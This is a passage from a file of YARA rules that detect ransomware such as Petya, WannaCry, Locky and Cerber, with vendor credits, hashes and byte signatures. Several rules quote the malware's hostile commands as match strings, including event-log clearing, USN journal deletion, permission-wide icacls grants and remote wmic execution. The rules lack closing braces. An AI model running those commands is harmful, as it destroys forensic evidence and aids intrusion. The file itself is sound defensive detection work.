       condition:   
           any of them   
rule DMALocker : ransom   
   	{   
   	    meta:   
   	    Description = "Deteccion del ransomware DMA Locker desde la version 1.0 a la 4.0"   
   	    ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/"   
   	    Author = "SadFud"   
   	    Date = "30/05/2016"   
   	       
   	    strings:   
   	    $uno = { 41 42 43 58 59 5a 31 31 }   
   		  $dos = { 21 44 4d 41 4c 4f 43 4b }   
   		  $tres = { 21 44 4d 41 4c 4f 43 4b 33 2e 30 }   
   		  $cuatro = { 21 44 4d 41 4c 4f 43 4b 34 2e 30 }   
   	       
   	    condition:   
   	    any of them   
   	       
// https://otx.alienvault.com/pulse/596f2fc5fbe8a278fe3af767
rule TeslaCrypt {   
   meta:   
       description = "Regla para detectar Tesla con md5"   
       author = "CCN-CERT"   
       version = "1.0"   
   strings:   
       $ = { 4E 6F 77 20 69 74 27 73 20 25 49 3A 25 4D 25 70 2E 00 00 00 76 61 6C 20 69 73 20 25 64 0A 00 00 }   
   condition:   
       all of them   
// https://otx.alienvault.com/pulse/59525e7a95270e240c055ead
rule DoublePulsarXor_Petya   
   {   
    meta:   
      description = "Rule to hit on the XORed DoublePulsar shellcode"   
      author = "Patrick Jones"   
      company = "Booz Allen Hamilton"   
      reference1 ="https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html"   
      reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf"   
      date = "2017-06-28"   
      hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"   
      hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"   
    strings:   
      $DoublePulsarXor_Petya = { FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC CC C3 FE }   
    condition:   
      $DoublePulsarXor_Petya   
rule DoublePulsarDllInjection_Petya   
   {   
    meta:   
     description = "Rule to hit on the XORed DoublePulsar DLL injection shellcode"   
     author = "Patrick Jones"   
     company = "Booz Allen Hamilton"   
     reference1 ="https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html"   
     reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf"   
     date = "2017-06-28"   
     hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"   
     hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"    
    strings:   
      $DoublePulsarDllInjection_Petya = { 45 20 8D 93 8D 92 8D 91 8D 90 92 93 91 97 0F 9F 9E 9D 99 84 45 29 84 4D 20 CC CD CC CC 9B 84 45 03 84 45 14 84 45 49 CC 33 33 33 24 77 CC CC CC 84 45 49 C4 33 33 33 24 84 CD CC CC 84 45 49 DC 33 33 33 84 47 49 CC 33 33 33 84 47 41 }   
    condition:   
      $DoublePulsarDllInjection_Petya   
rule ransomware_PetrWrap    
   {   
   meta:   
   	copyright= "Kaspersky Lab"   
   	description = "Rule to detect PetrWrap ransomware samples"   
       reference = "https://securelist.com/schroedingers-petya/78870/"   
   	last_modified = "2017-06-27"   
   	author = "Kaspersky Lab"   
   	hash = "71B6A493388E7D0B40C83CE903BC6B04"   
   	version = "1.0"   
   strings:   
   	$a1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcqYLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgqCXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu" fullword wide   
   	$a2 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls" fullword wide   
   	$a3 = "DESTROY ALL OF YOUR DATA PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" fullword ascii   
   	$a4 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" fullword ascii   
   	$a5 = "wowsmith123456posteo.net." fullword wide   
   condition:   
   	uint16(0) == 0x5A4D and filesize < 1000000 and any of them    
rule Petya_Ransomware {   
   	meta:   
   		description = "Detects Petya Ransomware"   
   		author = "Florian Roth"   
   		reference = "http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html"   
   		date = "2016-03-24"   
   		hash = "26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739"   
   	strings:   
   		$a1 = "<description>WinRAR SFX module</description>" fullword ascii   
      
   		$s1 = "BX-Proxy-Manual-Auth" fullword wide   
   		$s2 = "<!--The ID below indicates application support for Windows 10 -->" fullword ascii   
   		$s3 = "X-HTTP-Attempts" fullword wide   
   		$s4 = "@CommandLineMode" fullword wide   
   		$s5 = "X-Retry-After" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 500KB and $a1 and 3 of ($s*)   
rule FE_CPE_MS17_010_RANSOMWARE {   
   meta:version="1.1"   
         //filetype="PE"   
         author="Ian.Ahl@fireeye.com @TekDefense, Nicholas.Carr@mandiant.com @ItsReallyNick"   
         date="2017-06-27"   
         description="Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec"   
         reference = "https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html"   
   strings:   
         // DRIVE USAGE   
         $dmap01 = "\\\\.\\PhysicalDrive" nocase ascii wide   
         $dmap02 = "\\\\.\\PhysicalDrive0" nocase ascii wide   
         $dmap03 = "\\\\.\\C:" nocase ascii wide   
         $dmap04 = "TERMSRV" nocase ascii wide   
         $dmap05 = "\\admin$" nocase ascii wide   
         $dmap06 = "GetLogicalDrives" nocase ascii wide   
         $dmap07 = "GetDriveTypeW" nocase ascii wide   
      
         // RANSOMNOTE   
         $msg01 = "WARNING: DO NOT TURN OFF YOUR PC!" nocase ascii wide   
         $msg02 = "IF YOU ABORT THIS PROCESS" nocase ascii wide   
         $msg03 = "DESTROY ALL OF YOUR DATA!" nocase ascii wide   
         $msg04 = "PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" nocase ascii wide   
         $msg05 = "your important files are encrypted" ascii wide   
         $msg06 = "Your personal installation key" nocase ascii wide   
         $msg07 = "worth of Bitcoin to following address" nocase ascii wide   
         $msg08 = "CHKDSK is repairing sector" nocase ascii wide   
         $msg09 = "Repairing file system on " nocase ascii wide   
         $msg10 = "Bitcoin wallet ID" nocase ascii wide   
         $msg11 = "wowsmith123456@posteo.net" nocase ascii wide   
         $msg12 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" nocase ascii wide   
         $msg_pcre = /(en|de)crypt(ion|ed\.)/        
      
         // FUNCTIONALITY, APIS   
         $functions01 = "need dictionary" nocase ascii wide   
         $functions02 = "comspec" nocase ascii wide   
         $functions03 = "OpenProcessToken" nocase ascii wide   
         $functions04 = "CloseHandle" nocase ascii wide   
         $functions05 = "EnterCriticalSection" nocase ascii wide   
         $functions06 = "ExitProcess" nocase ascii wide   
         $functions07 = "GetCurrentProcess" nocase ascii wide   
         $functions08 = "GetProcAddress" nocase ascii wide   
         $functions09 = "LeaveCriticalSection" nocase ascii wide   
         $functions10 = "MultiByteToWideChar" nocase ascii wide   
         $functions11 = "WideCharToMultiByte" nocase ascii wide   
         $functions12 = "WriteFile" nocase ascii wide   
         $functions13 = "CoTaskMemFree" nocase ascii wide   
         $functions14 = "NamedPipe" nocase ascii wide   
         $functions15 = "Sleep" nocase ascii wide // imported, not in strings        
      
         // COMMANDS   
         //  -- Clearing event logs & USNJrnl   
         $cmd01 = "wevtutil cl Setup" ascii wide nocase   
         $cmd02 = "wevtutil cl System" ascii wide nocase   
         $cmd03 = "wevtutil cl Security" ascii wide nocase   
         $cmd04 = "wevtutil cl Application" ascii wide nocase   
         $cmd05 = "fsutil usn deletejournal" ascii wide nocase   
         // -- Scheduled task   
         $cmd06 = "schtasks " nocase ascii wide   
         $cmd07 = "/Create /SC " nocase ascii wide   
         $cmd08 = " /TN " nocase ascii wide   
         $cmd09 = "at %02d:%02d %ws" nocase ascii wide   
         $cmd10 = "shutdown.exe /r /f" nocase ascii wide   
         // -- Sysinternals/PsExec and WMIC   
         $cmd11 = "-accepteula -s" nocase ascii wide   
         $cmd12 = "wmic"   
         $cmd13 = "/node:" nocase ascii wide   
         $cmd14 = "process call create" nocase ascii wide   
      
   condition:   
         // (uint16(0) == 0x5A4D)   
         3 of ($dmap*)   
         and 2 of ($msg*)   
         and 9 of ($functions*)   
         and 7 of ($cmd*)   
rule Ransom_Petya {   
   meta:   
       description = "Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015"   
       author = "CCN-CERT"   
       version = "1.0"   
   strings:   
       $a1 = { C1 C8 14 2B F0 03 F0 2B F0 03 F0 C1 C0 14 03 C2 }   
       $a2 = { 46 F7 D8 81 EA 5A 93 F0 12 F7 DF C1 CB 10 81 F6 }   
       $a3 = { 0C 88 B9 07 87 C6 C1 C3 01 03 C5 48 81 C3 A3 01 00 00 }   
   condition:   
       all of them   
// https://otx.alienvault.com/pulse/5915db384da2585b4feaf2f6
rule WannaDecryptor: WannaDecryptor   
   {   
           meta:   
                   description = "Detection for common strings of WannaDecryptor"   
       
           strings:   
                   $id1 = "taskdl.exe"   
                   $id2 = "taskse.exe"   
                   $id3 = "r.wnry"   
                   $id4 = "s.wnry"   
                   $id5 = "t.wnry"   
                   $id6 = "u.wnry"   
                   $id7 = "msg/m_"   
       
           condition:   
                   3 of them   
rule Wanna_Cry_Ransomware_Generic {   
          meta:   
                 description = "Detects WannaCry Ransomware on Disk and in Virtual Page"   
                 author = "US-CERT Code Analysis Team"   
                 reference = "not set"                                           
                 date = "2017/05/12"   
          hash0 = "4DA1F312A214C07143ABEEAFB695D904"   
          strings:   
                 $s0 = {410044004D0049004E0024}   
                 $s1 = "WannaDecryptor"   
                 $s2 = "WANNACRY"   
                 $s3 = "Microsoft Enhanced RSA and AES Cryptographic"   
                 $s4 = "PKS"   
                 $s5 = "StartTask"   
                 $s6 = "wcry@123"   
                 $s7 = {2F6600002F72}   
                 $s8 = "unzip 0.15 Copyrigh"   
                 $s9 = "Global\\WINDOWS_TASKOSHT_MUTEX"           
                 $s10 = "Global\\WINDOWS_TASKCST_MUTEX"      
                $s11 = {7461736B736368652E657865000000005461736B5374617274000000742E776E7279000069636163}   
                $s12 = {6C73202E202F6772616E742045766572796F6E653A46202F54202F43202F5100617474726962202B68}   
                $s13 = "WNcry@2ol7"   
                $s14 = "wcry@123"   
                $s15 = "Global\\MsWinZonesCacheCounterMutexA"   
          condition:   
                 $s0 and $s1 and $s2 and $s3 or $s4 and $s5 and $s6 and $s7 or $s8 and $s9 and $s10 or $s11 and $s12 or $s13 or $s14 or $s15   
rule WannaCry_Ransomware_Gen {   
      meta:   
         description = "Detects WannaCry Ransomware"   
         author = "Florian Roth (based on rule by US CERT)"   
         reference = "https://www.us-cert.gov/ncas/alerts/TA17-132A"   
         date = "2017-05-12"   
         hash1 = "9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05"   
         hash2 = "8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df"   
         hash3 = "4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359"   
      strings:   
         $s1 = "__TREEID__PLACEHOLDER__" fullword ascii   
         $s2 = "__USERID__PLACEHOLDER__" fullword ascii   
         $s3 = "Windows for Workgroups 3.1a" fullword ascii   
         $s4 = "PC NETWORK PROGRAM 1.0" fullword ascii   
         $s5 = "LANMAN1.0" fullword ascii   
      condition:   
         uint16(0) == 0x5a4d and filesize < 5000KB and all of them   
rule lazaruswannacry {   
      meta:   
         description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"   
         date = "2017-05-15"   
         reference = "https://twitter.com/neelmehta/status/864164081116225536"   
         author = "Costin G. Raiu, Kaspersky Lab"   
         version = "1.0"   
         hash = "9c7c7149387a1c79679a87dd1ba755bc"   
         hash = "ac21c8ad899727137c4b94458d7aa8d8"   
      strings:   
         $a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75 04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 46 56 E8 }   
         $a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00 10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00 68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00 FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0 08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0 10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0 2B C0 2C C0 FF FE }   
      condition:   
         uint16(0) == 0x5A4D and filesize < 15000000 and all of them   
rule Wanna_Sample_4da1f312a214c07143abeeafb695d904: Wanna_Sample_4da1f312a214c07143abeeafb695d904   
   {   
           meta:   
                   description = "Specific sample match for WannaCryptor"   
                   MD5 = "4da1f312a214c07143abeeafb695d904"   
                   SHA1 = "b629f072c9241fd2451f1cbca2290197e72a8f5e"   
                   SHA256 = "aee20f9188a5c3954623583c6b0e6623ec90d5cd3fdec4e1001646e27664002c"   
                   INFO = "Looks for offsets of r.wry and s.wry instances"   
       
           strings:   
                   $rwnry = { 72 2e 77 72 79 }   
                   $swnry = { 73 2e 77 72 79 }   
       
           condition:   
                   $rwnry at 88195 and $swnry at 88656 and $rwnry at 4495639   
rule ransom_telefonica : TELEF   
   {   
     meta:   
       author = "Jaume Martin <@Xumeiquer>"   
       description = "Ransmoware Telefonica"   
       date = "2017-05-13"   
       reference = "http://www.elmundo.es/tecnologia/2017/05/12/59158a8ce5fdea194f8b4616.html"   
       md5 = "7f7ccaa16fb15eb1c7399d422f8363e8"   
       sha256 = "2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd"   
     strings:   
       $a = "RegCreateKeyW" wide ascii nocase   
       $b = "cmd.exe /c"   
       $c = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" ascii   
       $d = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" ascii   
       $e = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" ascii   
       $f = "tasksche.exe"   
     condition:   
       uint16(0) == 0x5A4D and $a and for all of ($b, $c, $d, $e, $f) : (@ > @a)   
rule WannCry_m_vbs {   
      meta:   
         description = "Detects WannaCry Ransomware VBS"   
         author = "Florian Roth"   
         reference = "https://goo.gl/HG2j5T"   
         date = "2017-05-12"   
         hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b"   
      strings:   
         $x1 = ".TargetPath = \"C:\\@" ascii   
         $x2 = ".CreateShortcut(\"C:\\@" ascii   
         $s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii   
      condition:   
         ( uint16(0) == 0x4553 and filesize < 1KB and all of them )   
rule NHS_Strain_Wanna: NHS_Strain_Wanna   
   {   
           meta:   
                   description = "Detection for worm-strain bundle of Wcry, DOublePulsar"   
                   MD5 = "db349b97c37d22f5ea1d1841e3c89eb4"   
                   SHA1 = "e889544aff85ffaf8b0d0da705105dee7c97fe26"   
                   SHA256 = "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"   
                   INFO = "Looks for specific offsets of c.wnry and t.wnry strings"   
       
           strings:   
                   $cwnry = { 63 2e 77 6e 72 79 }   
                   $twnry = { 74 2e 77 6e 72 79 }   
       
           condition:   
                   $cwnry at 262324 and $twnry at 267672 and $cwnry at 284970   
rule WannaCry_Ransomware {   
      meta:   
         description = "Detects WannaCry Ransomware"   
         author = "Florian Roth (with the help of binar.ly)"   
         reference = "https://goo.gl/HG2j5T"   
         date = "2017-05-12"   
         hash1 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"   
      strings:   
         $x1 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii   
         $x2 = "taskdl.exe" fullword ascii   
         $x3 = "tasksche.exe" fullword ascii   
         $x4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii   
         $x5 = "WNcry@2ol7" fullword ascii   
         $x6 = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" ascii   
         $x7 = "mssecsvc.exe" fullword ascii   
         $x8 = "C:\\%s\\qeriuwjhrf" fullword ascii   
         $x9 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii   
      
         $s1 = "C:\\%s\\%s" fullword ascii   
         $s2 = "<!-- Windows 10 --> " fullword ascii   
         $s3 = "cmd.exe /c \"%s\"" fullword ascii   
         $s4 = "msg/m_portuguese.wnry" fullword ascii   
         $s5 = "\\\\192.168.56.20\\IPC$" fullword wide   
         $s6 = "\\\\172.16.99.5\\IPC$" fullword wide   
      
         $op1 = { 10 ac 72 0d 3d ff ff 1f ac 77 06 b8 01 00 00 00 }   
         $op2 = { 44 24 64 8a c6 44 24 65 0e c6 44 24 66 80 c6 44 }   
         $op3 = { 18 df 6c 24 14 dc 64 24 2c dc 6c 24 5c dc 15 88 }   
         $op4 = { 09 ff 76 30 50 ff 56 2c 59 59 47 3b 7e 0c 7c }   
         $op5 = { c1 ea 1d c1 ee 1e 83 e2 01 83 e6 01 8d 14 56 }   
         $op6 = { 8d 48 ff f7 d1 8d 44 10 ff 23 f1 23 c1 }   
      condition:   
         uint16(0) == 0x5a4d and filesize < 10000KB and ( 1 of ($x*) and 1 of ($s*) or 3 of ($op*) )   
rule WannaCry_Ransomware_Dropper   
    {   
    meta:   
   	description = "WannaCry Ransomware Dropper"   
    	reference = "https://www.cylance.com/en_us/blog/threat-spotlight-inside-the-wannacry-attack.html"   
    	date = "2017-05-12"   
      
   strings:   
   	$s1 = "cmd.exe /c \"%s\"" fullword ascii   
    	$s2 = "tasksche.exe" fullword ascii   
    	$s3 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii   
    	$s4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii   
       
    condition:   
    	uint16(0) == 0x5a4d and filesize < 4MB and all of them   
rule WannCry_BAT {   
      meta:   
         description = "Detects WannaCry Ransomware BATCH File"   
         author = "Florian Roth"   
         reference = "https://goo.gl/HG2j5T"   
         date = "2017-05-12"   
         hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077"   
      strings:   
         $s1 = "@.exe\">> m.vbs" ascii   
         $s2 = "cscript.exe //nologo m.vbs" fullword ascii   
         $s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii   
         $s4 = "echo om.Save>> m.vbs" fullword ascii   
      condition:   
         ( uint16(0) == 0x6540 and filesize < 1KB and 1 of them )   
rule Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549: Wanna_Sample_84c82835a5d21bbcf75a61706d8ab549   
   {   
           meta:   
                   description = "Specific sample match for WannaCryptor"   
                   MD5 = "84c82835a5d21bbcf75a61706d8ab549"   
                   SHA1 = "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"   
                   SHA256 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"   
                   INFO = "Looks for 'taskdl' and 'taskse' at known offsets"   
       
           strings:   
                   $taskdl = { 00 74 61 73 6b 64 6c }   
                   $taskse = { 00 74 61 73 6b 73 65 }   
       
           condition:   
                   $taskdl at 3419456 and $taskse at 3422953   
rule MS17_010_WanaCry_worm {   
   	meta:   
   		description = "Worm exploiting MS17-010 and dropping WannaCry Ransomware"   
   		author = "Felipe Molina (@felmoltor)"   
   		reference = "https://www.exploit-db.com/exploits/41987/"   
   		date = "2017/05/12"   
   	strings:   
   		$ms17010_str1="PC NETWORK PROGRAM 1.0"   
   		$ms17010_str2="LANMAN1.0"   
   		$ms17010_str3="Windows for Workgroups 3.1a"   
   		$ms17010_str4="__TREEID__PLACEHOLDER__"   
   		$ms17010_str5="__USERID__PLACEHOLDER__"   
   		$wannacry_payload_substr1 = "h6agLCqPqVyXi2VSQ8O6Yb9ijBX54j"   
   		$wannacry_payload_substr2 = "h54WfF9cGigWFEx92bzmOd0UOaZlM"   
   		$wannacry_payload_substr3 = "tpGFEoLOU6+5I78Toh/nHs/RAP"   
      
   	condition:   
   		all of them   
rule WannaCry_RansomNote {   
      meta:   
         description = "Detects WannaCry Ransomware Note"   
         author = "Florian Roth"   
         reference = "https://goo.gl/HG2j5T"   
         date = "2017-05-12"   
         hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e"   
      strings:   
         $s1 = "A:  Don't worry about decryption." fullword ascii   
         $s2 = "Q:  What's wrong with my files?" fullword ascii   
      condition:   
         ( uint16(0) == 0x3a51 and filesize < 2KB and all of them )   
// https://otx.alienvault.com/pulse/594aa278d5ddc51c579520ef
rule Locky_Ransomware_2: ransom {   
   meta:   
       description = "Regla para detectar RANSOM.LOCKY"   
       author = "CCN-CERT"   
       version = "1.0"   
   strings:   
       $a1 = { 2E 00 6C 00 6F 00 63 00 6B 00 79 00 00 }   
       $a2 = { 00 5F 00 4C 00 6F 00 63 00 6B 00 79 00 }   
       $a3 = { 5F 00 72 00 65 00 63 00 6F 00 76 00 65 }   
       $a4 = { 00 72 00 5F 00 69 00 6E 00 73 00 74 00 }   
       $a5 = { 72 00 75 00 63 00 74 00 69 00 6F 00 6E }   
       $a6 = { 00 73 00 2E 00 74 00 78 00 74 00 00 }   
       $a7 = { 53 6F 66 74 77 61 72 65 5C 4C 6F 63 6B 79 00 }   
   condition:   
       all of them   
rule Locky_Ransomware : ransom {   
   	meta:   
   		description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"   
   		author = "Florian Roth (with the help of binar.ly)"   
   		reference = "https://goo.gl/qScSrE"   
   		date = "2016-02-17"   
   		hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8"   
   	strings:   
   		$o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 } // address=0x4144a7   
   		$o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 } // address=0x413863   
   	condition:   
   		all of ($o*)   
// https://otx.alienvault.com/pulse/58506bbbb3228a06556d0496
rule GoldenEye_Ransomware_XLS {   
      meta:   
         description = "GoldenEye XLS with Macro - file Schneider-Bewerbung.xls"   
         author = "Florian Roth"   
         reference = "https://goo.gl/jp2SkT"   
         date = "2016-12-06"   
         hash1 = "2320d4232ee80cc90bacd768ba52374a21d0773c39895b88cdcaa7782e16c441"   
      strings:   
         $x1 = "fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')" fullword ascii   
         $x2 = "var shell = new ActiveXObject('WScript.Shell');shell.run(t'" fullword ascii   
      condition:   
         ( uint16(0) == 0xcfd0 and filesize < 4000KB and 1 of them )   
rule GoldenEyeRansomware_Dropper_MalformedZoomit {   
      meta:   
         description = "Auto-generated rule - file b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"   
         author = "Florian Roth"   
         reference = "https://goo.gl/jp2SkT"   
         date = "2016-12-06"   
         hash1 = "b5ef16922e2c76b09edd71471dd837e89811c5e658406a8495c1364d0d9dc690"   
      strings:   
         $s1 = "ZoomIt - Sysinternals: www.sysinternals.com" fullword ascii   
         $n1 = "Mark Russinovich" wide   
      condition:   
         ( uint16(0) == 0x5a4d and filesize < 800KB and $s1 and not $n1 )   
// https://otx.alienvault.com/pulse/59480f989cf28a630421691d
rule Erebus: ransom   
   {   
   	meta:   
   		description = "Erebus Ransomware"   
   		author = "Joan Soriano / @joanbtl"   
   		date = "2017-06-23"   
   		version = "1.0"   
   		MD5 = "27d857e12b9be5d43f935b8cc86eaabf"   
   		SHA256 = "0b7996bca486575be15e68dba7cbd802b1e5f90436ba23f802da66292c8a055f"   
   		ref1 = "http://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/"   
   	strings:   
   		$a = "/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log"   
   		$b = "EREBUS IS BEST."   
   	condition:   
   		all of them   
// https://otx.alienvault.com/pulse/59761ec9a87db728f0caeede
rule cerber5b {   
   meta:   
     author = "pekeinfo"   
     date = "2016-12-20"   
     description = "Cerber5b"   
   strings:   
     $a={8B ?? ?8 ?? 4? 00 83 E? 02 89 ?? ?8 ?? 4? 00 68 ?C ?9 4? 00 [0-6] ?? ?? ?? ?? ?? ?8 ?? 4? 00 5? FF 15 ?? ?9 4? 00 89 45 ?4 83 7D ?4 00 75 02 EB 12 8B ?? ?0 83 C? 06 89 ?? ?0 B? DD 03 00 00 85}     
   condition:   
     $a   
rule cerber5 {   
   meta:   
     author = "pekeinfo"   
     date = "2016-12-02"   
     description = "Cerber5"   
   strings:   
     $a = {83 C4 04 A3 ?? ?? ?? 00 C7 45 ?? ?? ?? ?? 00 8B ?? ?? C6 0? 56 8B ?? ?? 5? 68 ?? ?? 4? 00 FF 15 ?? ?? 4? 00 50 FF 15 ?? ?? 4? 00 A3 ?? ?? 4? 00 68 1D 10 00 00 E8 ?? ?? FF FF 83 C4 04 ?? ?? ??}   
        
   condition:   
     1 of them    
rule cerber4 {   
   meta:   
           author = "pekeinfo"   
           date = "2016-09-09"   
           description = "Cerber4"   
   strings:   
           $a = {8B 0D ?? ?? 43 00 51 8B 15 ?? ?? 43 00 52 E8 C9 04 00 00 83 C4 08 89 45 FC A1 ?? ?? 43 00 3B 05 ?? ?? 43 00 72 02}   
      
   condition:   
           1 of them    
rule cerber3 {   
   meta:   
     author = "pekeinfo"   
     date = "2016-09-09"   
     description = "Cerber3 "   
   strings:   
     $a = {00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 03 6A  01 8B 85}   
     $b = {68 3B DB 00 00 ?? ?? ?? ?? 00 ?? FF 15}   
        
   condition:   
     1 of them    
// https://otx.alienvault.com/pulse/5977b327f7cda563fc57bdb7
rule Ransom_CryptXXX_Dropper   
   {   
       /*   
         Regla para detectar el dropper de Ransom.CryptXXX con MD5 d01fd2bb8c6296d51be297978af8b3a1   
       */   
       meta:   
           description = "Regla para detectar RANSOM.CRYPTXXX"   
           author      = "CCN-CERT"   
           version     = "1.0"   
       strings:   
           $a = { 50 65 31 57 58 43 46 76 59 62 48 6F 35 }   
           $b = { 43 00 3A 00 5C 00 42 00 49 00 45 00 52 00 5C 00 51 00 6D 00 6B 00 4E 00 52 00 4C 00 46 00 00 }   
       condition:   
           all of them   
rule Ransom_CryptXXX_Real   
   {   
       /*   
         Regla para detectar el codigo Ransom.CryptXXX fuera del dropper con MD5 ae06248ab3c02e1c2ca9d53b9a155199   
       */   
       meta:   
           description = "Regla para detectar Ransom.CryptXXX original"   
           author      = "CCN-CERT"   
           version     = "1.0"   
       strings:   
           $a = { 52 59 47 40 4A 41 59 5D 52 00 00 00 FF FF FF FF }   
   		$b = { 06 00 00 00 52 59 47 40 40 5A 00 00 FF FF FF FF }   
   		$c = { 0A 00 00 00 52 5C 4B 4D 57 4D 42 4B 5C 52 00 00 }   
   		$d = { FF FF FF FF 0A 00 00 00 52 5D 57 5D 5A 4B 43 70 }   
   		$e = { 3F 52 00 00 FF FF FF FF 06 00 00 00 52 4C 41 41 }   
   		$f = { 5A 52 00 00 FF FF FF FF 0A 00 00 00 52 5C 4B 4D }   
   		$g = { 41 58 4B 5C 57 52 00 00 FF FF FF FF 0E 00 00 00 }   
   		$h = { 52 2A 5C 4B 4D 57 4D 42 4B 20 4C 47 40 52 00 00 }   
   		$i = { FF FF FF FF 0A 00 00 00 52 5E 4B 5C 48 42 41 49 }   
   		$j = { 5D 52 00 00 FF FF FF FF 05 00 00 00 52 4B 48 47 }   
   		$k = { 52 00 00 00 FF FF FF FF 0C 00 00 00 52 4D 41 40 }   
   		$l = { 48 47 49 20 43 5D 47 52 00 00 00 00 FF FF FF FF }   
   		$m = { 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 3F 52 00 00 }   
   		$n = { FF FF FF FF 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 }   
   		$o = { 3C 52 00 00 FF FF FF FF 08 00 00 00 52 49 41 41 }   
   		$p = { 49 42 4B 52 00 00 00 00 FF FF FF FF 06 00 00 00 }   
   		$q = { 52 5A 4B 43 5E 52 00 00 FF FF FF FF 08 00 00 00 }   
   		$v = { 52 48 3A 4C 4D 70 3F 52 00 00 00 00 FF FF FF FF }   
   		$w = { 0A 00 00 00 52 4F 42 42 5B 5D 4B 70 3F 52 00 00 }   
   		$x = { FF FF FF FF 0A 00 00 00 52 5E 5C 41 49 5C 4F 70 }   
   		$y = { 3F 52 00 00 FF FF FF FF 0A 00 00 00 52 5E 5C 41 }   
